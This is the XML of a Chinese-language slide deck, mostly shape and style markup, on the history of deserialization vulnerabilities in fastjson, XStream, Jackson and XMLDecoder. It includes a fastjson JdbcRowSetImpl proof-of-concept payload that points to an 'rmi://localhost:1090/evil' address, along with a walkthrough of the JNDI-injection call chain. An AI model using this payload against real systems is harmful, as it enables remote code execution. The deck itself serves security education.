                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2837789" y="4544190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837789" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837788" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837788" y="8001905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8001905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6376305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="196850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zh-CN" altLang="en-US" sz="1865"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="圆角矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002060" y="4379076"/>
            <a:ext cx="6838231" cy="42891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defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1865">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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56487" y="2092177"/>
            <a:ext cx="4805036" cy="156654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altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PART 02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3866455" y="3777733"/>
            <a:ext cx="6937973" cy="912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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2665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fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2665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65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XStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2665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2665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jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2665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endParaRPr lang="en-US" altLang="zh-CN" sz="2665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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2665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XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2665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组件历史漏洞总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="组合 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2383327" y="2490049"/>
            <a:ext cx="702937" cy="707692"/>
            <a:chOff x="5042691" y="2273920"/>
            <a:chExt cx="702937" cy="707692"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5284806" y="2789968"/>
              <a:ext cx="460822" cy="191644"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 533"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 158 w 533"/>
                <a:gd name="T3" fmla="*/ 165 h 222"/>
                <a:gd name="T4" fmla="*/ 158 w 533"/>
                <a:gd name="T5" fmla="*/ 108 h 222"/>
                <a:gd name="T6" fmla="*/ 184 w 533"/>
                <a:gd name="T7" fmla="*/ 83 h 222"/>
                <a:gd name="T8" fmla="*/ 317 w 533"/>
                <a:gd name="T9" fmla="*/ 83 h 222"/>
                <a:gd name="T10" fmla="*/ 317 w 533"/>
                <a:gd name="T11" fmla="*/ 25 h 222"/>
                <a:gd name="T12" fmla="*/ 343 w 533"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 533 w 533"/>
                <a:gd name="T15" fmla="*/ 0 h 222"/>
                <a:gd name="T16" fmla="*/ 533 w 533"/>
                <a:gd name="T17" fmla="*/ 32 h 222"/>
                <a:gd name="T18" fmla="*/ 508 w 533"/>
                <a:gd name="T19" fmla="*/ 57 h 222"/>
                <a:gd name="T20" fmla="*/ 375 w 533"/>
                <a:gd name="T21" fmla="*/ 57 h 222"/>
                <a:gd name="T22" fmla="*/ 375 w 533"/>
                <a:gd name="T23" fmla="*/ 114 h 222"/>
                <a:gd name="T24" fmla="*/ 349 w 533"/>
                <a:gd name="T25" fmla="*/ 140 h 222"/>
                <a:gd name="T26" fmla="*/ 216 w 533"/>
                <a:gd name="T27" fmla="*/ 140 h 222"/>
                <a:gd name="T28" fmla="*/ 216 w 533"/>
                <a:gd name="T29" fmla="*/ 197 h 222"/>
                <a:gd name="T30" fmla="*/ 190 w 533"/>
                <a:gd name="T31" fmla="*/ 222 h 222"/>
                <a:gd name="T32" fmla="*/ 0 w 533"/>
                <a:gd name="T33" fmla="*/ 222 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 533"/>
                <a:gd name="T35" fmla="*/ 191 h 222"/>
                <a:gd name="T36" fmla="*/ 25 w 533"/>
                <a:gd name="T37" fmla="*/ 165 h 2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33" h="222">
                  <a:moveTo>
                    <a:pt x="25" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="165"/>
                    <a:pt x="158" y="165"/>
                    <a:pt x="158" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="108"/>
                    <a:pt x="158" y="108"/>
                    <a:pt x="158" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="94"/>
                    <a:pt x="170" y="83"/>
                    <a:pt x="184" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="83"/>
                    <a:pt x="317" y="83"/>
                    <a:pt x="317" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="25"/>
                    <a:pt x="317" y="25"/>
                    <a:pt x="317" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="11"/>
                    <a:pt x="329" y="0"/>
                    <a:pt x="343" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="533" y="0"/>
                    <a:pt x="533" y="0"/>
                    <a:pt x="533" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="533" y="32"/>
                    <a:pt x="533" y="32"/>
                    <a:pt x="533" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="533" y="46"/>
                    <a:pt x="522" y="57"/>
                    <a:pt x="508" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="57"/>
                    <a:pt x="375" y="57"/>
                    <a:pt x="375" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="114"/>
                    <a:pt x="375" y="114"/>
                    <a:pt x="375" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="128"/>
                    <a:pt x="363" y="140"/>
                    <a:pt x="349" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="140"/>
                    <a:pt x="216" y="140"/>
                    <a:pt x="216" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="197"/>
                    <a:pt x="216" y="197"/>
                    <a:pt x="216" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="211"/>
                    <a:pt x="204" y="222"/>
                    <a:pt x="190" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="191"/>
                    <a:pt x="0" y="191"/>
                    <a:pt x="0" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="177"/>
                    <a:pt x="11" y="165"/>
                    <a:pt x="25" y="16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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Freeform 13"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5042691" y="2273920"/>
              <a:ext cx="529214" cy="655758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 612"/>
                <a:gd name="T1" fmla="*/ 504 h 759"/>
                <a:gd name="T2" fmla="*/ 148 w 612"/>
                <a:gd name="T3" fmla="*/ 514 h 759"/>
                <a:gd name="T4" fmla="*/ 179 w 612"/>
                <a:gd name="T5" fmla="*/ 488 h 759"/>
                <a:gd name="T6" fmla="*/ 184 w 612"/>
                <a:gd name="T7" fmla="*/ 423 h 759"/>
                <a:gd name="T8" fmla="*/ 158 w 612"/>
                <a:gd name="T9" fmla="*/ 392 h 759"/>
                <a:gd name="T10" fmla="*/ 38 w 612"/>
                <a:gd name="T11" fmla="*/ 381 h 759"/>
                <a:gd name="T12" fmla="*/ 7 w 612"/>
                <a:gd name="T13" fmla="*/ 407 h 759"/>
                <a:gd name="T14" fmla="*/ 2 w 612"/>
                <a:gd name="T15" fmla="*/ 473 h 759"/>
                <a:gd name="T16" fmla="*/ 28 w 612"/>
                <a:gd name="T17" fmla="*/ 504 h 759"/>
                <a:gd name="T18" fmla="*/ 157 w 612"/>
                <a:gd name="T19" fmla="*/ 669 h 759"/>
                <a:gd name="T20" fmla="*/ 254 w 612"/>
                <a:gd name="T21" fmla="*/ 487 h 759"/>
                <a:gd name="T22" fmla="*/ 334 w 612"/>
                <a:gd name="T23" fmla="*/ 512 h 759"/>
                <a:gd name="T24" fmla="*/ 342 w 612"/>
                <a:gd name="T25" fmla="*/ 515 h 759"/>
                <a:gd name="T26" fmla="*/ 216 w 612"/>
                <a:gd name="T27" fmla="*/ 722 h 759"/>
                <a:gd name="T28" fmla="*/ 157 w 612"/>
                <a:gd name="T29" fmla="*/ 669 h 759"/>
                <a:gd name="T30" fmla="*/ 379 w 612"/>
                <a:gd name="T31" fmla="*/ 7 h 759"/>
                <a:gd name="T32" fmla="*/ 426 w 612"/>
                <a:gd name="T33" fmla="*/ 84 h 759"/>
                <a:gd name="T34" fmla="*/ 349 w 612"/>
                <a:gd name="T35" fmla="*/ 150 h 759"/>
                <a:gd name="T36" fmla="*/ 304 w 612"/>
                <a:gd name="T37" fmla="*/ 59 h 759"/>
                <a:gd name="T38" fmla="*/ 379 w 612"/>
                <a:gd name="T39" fmla="*/ 7 h 759"/>
                <a:gd name="T40" fmla="*/ 371 w 612"/>
                <a:gd name="T41" fmla="*/ 183 h 759"/>
                <a:gd name="T42" fmla="*/ 403 w 612"/>
                <a:gd name="T43" fmla="*/ 199 h 759"/>
                <a:gd name="T44" fmla="*/ 574 w 612"/>
                <a:gd name="T45" fmla="*/ 278 h 759"/>
                <a:gd name="T46" fmla="*/ 579 w 612"/>
                <a:gd name="T47" fmla="*/ 341 h 759"/>
                <a:gd name="T48" fmla="*/ 398 w 612"/>
                <a:gd name="T49" fmla="*/ 296 h 759"/>
                <a:gd name="T50" fmla="*/ 381 w 612"/>
                <a:gd name="T51" fmla="*/ 385 h 759"/>
                <a:gd name="T52" fmla="*/ 390 w 612"/>
                <a:gd name="T53" fmla="*/ 402 h 759"/>
                <a:gd name="T54" fmla="*/ 561 w 612"/>
                <a:gd name="T55" fmla="*/ 593 h 759"/>
                <a:gd name="T56" fmla="*/ 489 w 612"/>
                <a:gd name="T57" fmla="*/ 626 h 759"/>
                <a:gd name="T58" fmla="*/ 233 w 612"/>
                <a:gd name="T59" fmla="*/ 447 h 759"/>
                <a:gd name="T60" fmla="*/ 203 w 612"/>
                <a:gd name="T61" fmla="*/ 392 h 759"/>
                <a:gd name="T62" fmla="*/ 231 w 612"/>
                <a:gd name="T63" fmla="*/ 239 h 759"/>
                <a:gd name="T64" fmla="*/ 157 w 612"/>
                <a:gd name="T65" fmla="*/ 344 h 759"/>
                <a:gd name="T66" fmla="*/ 95 w 612"/>
                <a:gd name="T67" fmla="*/ 332 h 759"/>
                <a:gd name="T68" fmla="*/ 247 w 612"/>
                <a:gd name="T69" fmla="*/ 155 h 759"/>
                <a:gd name="T70" fmla="*/ 313 w 612"/>
                <a:gd name="T71" fmla="*/ 163 h 759"/>
                <a:gd name="T72" fmla="*/ 349 w 612"/>
                <a:gd name="T73" fmla="*/ 227 h 759"/>
                <a:gd name="T74" fmla="*/ 371 w 612"/>
                <a:gd name="T75" fmla="*/ 183 h 7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612" h="759">
                  <a:moveTo>
                    <a:pt x="28" y="504"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="514"/>
                    <a:pt x="148" y="514"/>
                    <a:pt x="148" y="514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="516"/>
                    <a:pt x="177" y="504"/>
                    <a:pt x="179" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="423"/>
                    <a:pt x="184" y="423"/>
                    <a:pt x="184" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="407"/>
                    <a:pt x="174" y="393"/>
                    <a:pt x="158" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="381"/>
                    <a:pt x="38" y="381"/>
                    <a:pt x="38" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="380"/>
                    <a:pt x="9" y="392"/>
                    <a:pt x="7" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="473"/>
                    <a:pt x="2" y="473"/>
                    <a:pt x="2" y="473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="489"/>
                    <a:pt x="12" y="503"/>
                    <a:pt x="28" y="504"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="157" y="669"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="595"/>
                    <a:pt x="230" y="592"/>
                    <a:pt x="254" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="496"/>
                    <a:pt x="307" y="504"/>
                    <a:pt x="334" y="512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="513"/>
                    <a:pt x="339" y="514"/>
                    <a:pt x="342" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="633"/>
                    <a:pt x="296" y="637"/>
                    <a:pt x="216" y="722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="759"/>
                    <a:pt x="122" y="709"/>
                    <a:pt x="157" y="669"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="379" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="413" y="15"/>
                    <a:pt x="434" y="49"/>
                    <a:pt x="426" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="419" y="120"/>
                    <a:pt x="383" y="157"/>
                    <a:pt x="349" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="143"/>
                    <a:pt x="297" y="94"/>
                    <a:pt x="304" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="23"/>
                    <a:pt x="345" y="0"/>
                    <a:pt x="379" y="7"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="371" y="183"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="185"/>
                    <a:pt x="393" y="190"/>
                    <a:pt x="403" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="494" y="286"/>
                    <a:pt x="474" y="282"/>
                    <a:pt x="574" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="612" y="277"/>
                    <a:pt x="611" y="338"/>
                    <a:pt x="579" y="341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="350"/>
                    <a:pt x="470" y="358"/>
                    <a:pt x="398" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="385"/>
                    <a:pt x="381" y="385"/>
                    <a:pt x="381" y="385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="392"/>
                    <a:pt x="383" y="399"/>
                    <a:pt x="390" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="494" y="448"/>
                    <a:pt x="515" y="448"/>
                    <a:pt x="561" y="593"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="578" y="638"/>
                    <a:pt x="510" y="668"/>
                    <a:pt x="489" y="626"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="484"/>
                    <a:pt x="405" y="506"/>
                    <a:pt x="233" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="435"/>
                    <a:pt x="203" y="416"/>
                    <a:pt x="203" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="239"/>
                    <a:pt x="231" y="239"/>
                    <a:pt x="231" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="260"/>
                    <a:pt x="171" y="259"/>
                    <a:pt x="157" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="376"/>
                    <a:pt x="91" y="372"/>
                    <a:pt x="95" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="207"/>
                    <a:pt x="126" y="199"/>
                    <a:pt x="247" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="149"/>
                    <a:pt x="304" y="160"/>
                    <a:pt x="313" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="227"/>
                    <a:pt x="349" y="227"/>
                    <a:pt x="349" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="183"/>
                    <a:pt x="371" y="183"/>
                    <a:pt x="371" y="1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1865"/>
            </a:p>
          </p:txBody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3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16" grpId="0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远程加载恶意类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Jndi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-Bean Property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351934" y="1169719"/>
            <a:ext cx="1160125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POC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","+ "\"dataSourceName\":\"" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rmi://localhost:1090/evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> + "\","+ "\"autoCommit\":\"true\"}";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 err="1"/>
              <a:t>setDataSourceName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>赋值恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址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3BD33B6-35A8-4E62-A96E-E4CD4D61D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08" y="2694005"/>
            <a:ext cx="80962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348605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0815" y="151130"/>
            <a:ext cx="6635338" cy="506095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="913765">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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远程加载恶意类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 defTabSz="913765">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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dirty="0" err="1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Jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-Bean Property</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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类型</a:t>
            </a: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en-US" altLang="zh-CN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defTabSz="913765">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US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5A1F6A1-2F6B-4F87-A401-4BD4340B85FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295373" y="1490229"/>
            <a:ext cx="11601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调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setAutoCommit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>var1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，跟进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br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BD63CE-D6FB-4CA1-9311-B09CF1F7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89" y="1980175"/>
            <a:ext cx="7343775" cy="223837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FE6E871-CB49-4270-B8C4-A3EDE2909462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295372" y="4385330"/>
            <a:ext cx="76514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 dirty="0"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法触发漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getDataSourceName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>得到的是恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址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330260-ECF7-4F1A-B682-AE429DCDC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9" y="4921442"/>
            <a:ext cx="7315200" cy="14954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95F996-085E-4708-8331-50963672653F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8168549" y="2228893"/>
            <a:ext cx="3274093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>
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>总结：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:srgbClr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2400" dirty="0"/>
              <a:t>首先调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法赋值（这也就是我们数据可控的地方），后来通过反射的方法循环调用指定类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法（漏洞触发点）。这里漏洞触发点是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Source:set,get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法触发。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Sink:jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入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0255962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Office 主题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1625</TotalTime>
  <Words>1588</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>194</Paragraphs>
  <Slides>31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ITC Avant Garde Std XLt</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Impact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kangrui</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-23T03:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-10T02:44:43Z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2052-10.1.0.6393</vt:lpwstr>
  </property>
</Properties>
</file>